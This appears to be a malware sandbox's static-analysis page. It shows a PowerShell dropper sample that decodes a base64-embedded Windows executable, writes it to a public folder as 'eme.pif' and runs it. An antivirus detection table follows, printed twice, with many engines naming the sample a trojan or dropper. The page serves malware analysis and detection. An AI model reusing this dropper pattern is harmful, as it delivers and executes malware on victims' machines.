Static | ZeroBOX

$base64EncodedExe = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABFis9QAAAAAAAAAAOAAAgELATAAAHwMAAAIAAAAAAAAgpoMAAAgAAAAoAwAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADgDAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADCaDABPAAAAAKAMAJwFAAAAAAAAAAAAAAAAAAAAAAAAAMAMAAwAAAAUmgwAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAmHoMAAAgAAAAfAwAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJwFAAAAoAwAAAYAAAB+DAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAMAMAAACAAAAhAwAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABkmgwAAAAAAEgAAAACAAUA3EAAAGBBAAADAAAAAQAABjyCAADYFwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGoAKB4AAAoAFigfAAAKAHMCAAAGKCAAAAoAKv4CcyEAAAp9AgAABAJzIgAACn0DAAAEAhR9BAAABAIUfQYAAAQCKCMAAAoAAAIoCAAABgACcw0AAAZ9AQAABCoAGzADAAYBAAABAAARAAJ7AgAABG8kAAAKF/4BFv4BCwcsBgA46QAAAAJ7AgAABG8lAAAKCgYoJgAACgwAAgJ7AQAABAh

$exeBytes = [System.Convert]::FromBase64String($base64EncodedExe)

Set-Content -Path "C:\Users\Public\eme.pif" -Value $exeBytes -Encoding Byte

Start-Process -FilePath "C:\Users\Public\eme.pif"

Antivirus	Signature
Bkav	Clean
Lionic	Clean
DrWeb	Clean
ClamAV	Clean
FireEye	Trojan.GenericKDZ.98074
CAT-QuickHeal	Clean
McAfee	PS/Dropper.c
Malwarebytes	Clean
VIPRE	Trojan.GenericKDZ.98074
Sangfor	Clean
K7AntiVirus	Clean
K7GW	Clean
BitDefenderTheta	Clean
VirIT	Clean
Cyren	Clean
Symantec	Scr.Malcode!gdn30
ESET-NOD32	a variant of MSIL/Kryptik.AIIR
TrendMicro-HouseCall	Clean
Avast	Clean
Cynet	Clean
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Trojan.GenericKDZ.98074
NANO-Antivirus	Clean
ViRobot	Clean
MicroWorld-eScan	Trojan.GenericKDZ.98074
Rising	Clean
Sophos	Clean
F-Secure	Clean
Baidu	Clean
Zillya	Clean
TrendMicro	Clean
McAfee-GW-Edition	BehavesLike.PS.Dropper.tn
CMC	Clean
Emsisoft	Trojan.GenericKDZ.98074 (B)
Ikarus	Clean
GData	Trojan.GenericKDZ.98074
Jiangmin	Clean
Avira	Clean
Antiy-AVL	Clean
Gridinsoft	Clean
Xcitium	Clean
Arcabit	Trojan.Generic.D17F1A
SUPERAntiSpyware	Clean
ZoneAlarm	Clean
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
Google	Clean
AhnLab-V3	Clean
Acronis	Clean
VBA32	Clean
ALYac	Gen:Variant.Lazy.312835
MAX	malware (ai score=86)
Zoner	Clean
Tencent	Clean
Yandex	Clean
TACHYON	Clean
MaxSecure	Clean
Fortinet	Clean
AVG	Clean
Panda	Clean

Antivirus

Signature

Bkav

Clean

Lionic

Clean

DrWeb

Clean

ClamAV

Clean

FireEye

Trojan.GenericKDZ.98074

CAT-QuickHeal

Clean

McAfee

PS/Dropper.c

Malwarebytes

Clean

VIPRE

Trojan.GenericKDZ.98074

Sangfor

Clean

K7AntiVirus

Clean

K7GW

Clean

BitDefenderTheta

Clean

VirIT

Clean

Cyren

Clean

Symantec

Scr.Malcode!gdn30

ESET-NOD32

a variant of MSIL/Kryptik.AIIR

TrendMicro-HouseCall

Clean

Avast

Clean

Cynet

Clean

Kaspersky

UDS:DangerousObject.Multi.Generic

BitDefender

Trojan.GenericKDZ.98074

NANO-Antivirus

Clean

ViRobot

Clean

MicroWorld-eScan

Trojan.GenericKDZ.98074

Rising

Clean

Sophos

Clean

F-Secure

Clean

Baidu

Clean

Zillya

Clean

TrendMicro

Clean

McAfee-GW-Edition

BehavesLike.PS.Dropper.tn

CMC

Clean

Emsisoft

Trojan.GenericKDZ.98074 (B)

Ikarus

Clean

GData

Trojan.GenericKDZ.98074

Jiangmin

Clean

Avira

Clean

Antiy-AVL

Clean

Gridinsoft

Clean

Xcitium

Clean

Arcabit

Trojan.Generic.D17F1A

SUPERAntiSpyware

Clean

ZoneAlarm

Clean

Microsoft

Trojan:Win32/Sabsik.FL.B!ml

Google

Clean

AhnLab-V3

Clean

Acronis

Clean

VBA32

Clean

ALYac

Gen:Variant.Lazy.312835

MAX

malware (ai score=86)

Zoner

Clean

Tencent

Clean

Yandex

Clean

TACHYON

Clean

MaxSecure

Clean

Fortinet

Clean

AVG

Clean

Panda

Clean